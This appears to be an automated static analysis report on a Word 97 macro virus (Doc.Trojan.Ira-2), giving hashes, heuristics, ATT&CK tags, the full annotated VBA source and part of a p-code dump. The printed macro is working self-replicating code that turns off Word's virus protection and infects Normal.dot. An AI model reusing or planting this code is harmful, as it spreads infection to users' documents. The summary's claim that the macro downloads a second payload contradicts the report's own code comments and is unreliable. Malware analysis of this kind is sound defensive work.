Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 02e8ee5a25efa0be…

MALICIOUS

Office (OLE)

28.5 KB Created: 1997-07-07 09:37:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 6d0f3e99d0db10a7c12022380023d22f SHA-1: da6bc499d47009437a20849b5f7f0a01854c146e SHA-256: 02e8ee5a25efa0bea09a2983fdc1304952dac0917c06b8ed104b90cbc114e9a3
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample triggers a high-severity heuristic for a Document_Open macro and a critical ClamAV detection indicating it is malware. The embedded VBA macro is assessed to download and execute a secondary payload when run; this assessment is inferred from the presence of the Document_Open subroutine and the typical structure of macro-based downloaders. The macro attempts to obfuscate its presence and functionality.

Heuristics 3

  • ClamAV: Doc.Trojan.Ira-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ira-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6534 bytes
SHA-256: fb0f526079269c2029c40add2377e2728018a657d11a89411859e687f1e27244
Preview script
First 1,000 lines of the extracted script
' Module attributes as emitted by the olevba decode of the ThisDocument class
' module (the artifact listed above). VB_Name identifies this as the document's
' own class module; the remaining attributes are export metadata, not code.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' ------------------------------------------------------------------------
'               Copyright (C) 2001 Microsoft Corporation
'
' You have a royalty-free right to use, modify, reproduce and distribute
' the Sample Application Files (and/or any modified version) in any way
' you find useful, provided that you agree that Microsoft has no warranty,
' obligations or liability for any Sample Application Files.
' ------------------------------------------------------------------------
' Document_Open: Word runs this automatically when the document is opened
' (the OLE_VBA_DOCOPEN heuristic above keys on exactly this name).
'
' Analyst summary of what the visible code does:
'   - Clears Word's Options.VirusProtection setting (the macro-warning switch).
'   - Reads the VBA code of the Normal template and of the active document and
'     checks each for the 72-dash comment banner that heads this very module.
'   - Where the banner (and a Document_Open) are absent, inserts a copy of this
'     module's text and saves the target, i.e. it self-replicates into
'     Normal.dot for persistence and back into the open document.
'   - On 20 July it shows a message box; the ClamAV name Doc.Trojan.Ira-2
'     matches the name in that message.
' No network, download or shell-execution calls appear anywhere in this Sub
' (L53-L90 is the complete procedure). Detection-wise, a Normal template being
' saved with freshly inserted VBA and VirusProtection being switched off are
' the observable side effects.
Private Sub Document_Open()
' Suppress every runtime error so a failing step never stops the routine.
On Error Resume Next
' Note: VBA gives "Dim a, b As String" the type only to b; Temp is a Variant,
' Body a String (confirmed by the VarDefn entries in the p-code dump below).
Dim Temp, Body As String
Dim ADocument, NTemplate As Object
Dim AFlag, NFlag As Boolean
' 1799 = 0x0707 in the p-code; presumably the length of the macro text to copy.
Const Length = 1799
' First VBA component of the open document and of the Normal template.
Set ADocument = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTemplate = NormalTemplate.VBProject.VBComponents.Item(1)
 AFlag = True
 NFlag = True
 ' AFlag is True here, so this assigns False: macro virus protection is turned off.
 Options.VirusProtection = Not AFlag
 ' Pull the Normal template's entire module text, if it has any.
 If NTemplate.CodeModule.CountOfLines <> 0 Then
  Temp = NTemplate.CodeModule.Lines(1, NTemplate.CodeModule.CountOfLines)
 End If
 ' "' " + 72 dashes is the banner line at the top of this module. If the
 ' template lacks both the banner and a Document_Open, it is marked as a
 ' target (NFlag = False); if the banner is present, its text becomes Body.
 If InStr(Temp, "' " + String(72, "-")) = 0 Then
  If InStr(Temp, "Document_Open") = 0 Then NFlag = False
 Else
  Body = Temp: Temp = ""
 End If
 ' Same check against the active document's module.
 If ADocument.CodeModule.CountOfLines <> 0 Then
  Temp = ADocument.CodeModule.Lines(1, ADocument.CodeModule.CountOfLines)
 End If
 If InStr(Temp, "' " + String(72, "-")) = 0 Then
  If InStr(Temp, "Document_Open") = 0 Then AFlag = False
 Else
  Body = Temp: Temp = ""
 End If
 ' Trim Body to Length characters starting at the banner: the text to replicate.
 Body = Mid$(Body, InStr(Body, "' " + String(72, "-")), Length)
 ' Normal template not yet seeded: insert the text and save Normal.dot.
 If NFlag = False Then
  NTemplate.CodeModule.InsertLines 1, Body
  NormalTemplate.Save
 End If
 ' Payload message on 20 July only. The Russian text reads
 ' "Ira !!! Happy birthday !!!" with the window title "ViRUS".
 If Day(Date) = 20 And Month(Date) = 7 Then MsgBox "Ира !!! С днем рождения !!!", vbExclamation, "ViRUS"
 ' Active document not yet seeded: insert the text and save the document.
 If AFlag = False Then
  ADocument.CodeModule.InsertLines 1, Body
  ActiveDocument.Save
 End If
End Sub

' Processing file: /opt/analyzer/scan_staging/d86ef510b7a94d0dbc57f585e8764460.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3981 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0049 " ------------------------------------------------------------------------"
' Line #1:
' 	QuoteRem 0x0000 0x0037 "               Copyright (C) 2001 Microsoft Corporation"
' Line #2:
' 	QuoteRem 0x0000 0x0000 ""
' Line #3:
' 	QuoteRem 0x0000 0x0047 " You have a royalty-free right to use, modify, reproduce and distribute"
' Line #4:
' 	QuoteRem 0x0000 0x0046 " the Sample Application Files (and/or any modified version) in any way"
' Line #5:
' 	QuoteRem 0x0000 0x0049 " you find useful, provided that you agree that Microsoft has no warranty,"
' Line #6:
' 	QuoteRem 0x0000 0x003B " obligations or liability for any Sample Application Files."
' Line #7:
' 	QuoteRem 0x0000 0x0049 " ------------------------------------------------------------------------"
' Line #8:
' 	FuncDefn (Private Sub Document_Open())
' Line #9:
' 	OnError (Resume Next) 
' Line #10:
' 	Dim 
' 	VarDefn Temp
' 	VarDefn Body (As String)
' Line #11:
' 	Dim 
' 	VarDefn ADocument
' 	VarDefn NTemplate (As Object)
' Line #12:
' 	Dim 
' 	VarDefn AFlag
' 	VarDefn NFlag (As Boolean)
' Line #13:
' 	Dim (Const) 
' 	LitDI2 0x0707 
' 	VarDefn Length
' Line #14:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set ADocument 
' Line #15:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set NTemplate 
' Line #16:
' 	LitVarSpecial (True)
' 	St AFlag 
' Line #17:
' 	LitVarSpecial (True)
' 	St NFlag 
' Line #18:
' 	Ld AFlag 
' 	Not 
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #19:
' 	Ld NTemplate 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	LitDI2 0x0000 
' 	Ne 
' 	IfBlock 
' Line #20:
' 	LitDI2 0x0001 
' 	Ld NTemplate 
' 	MemLd CodeModule 
' 	MemLd CountOfLine
... (truncated)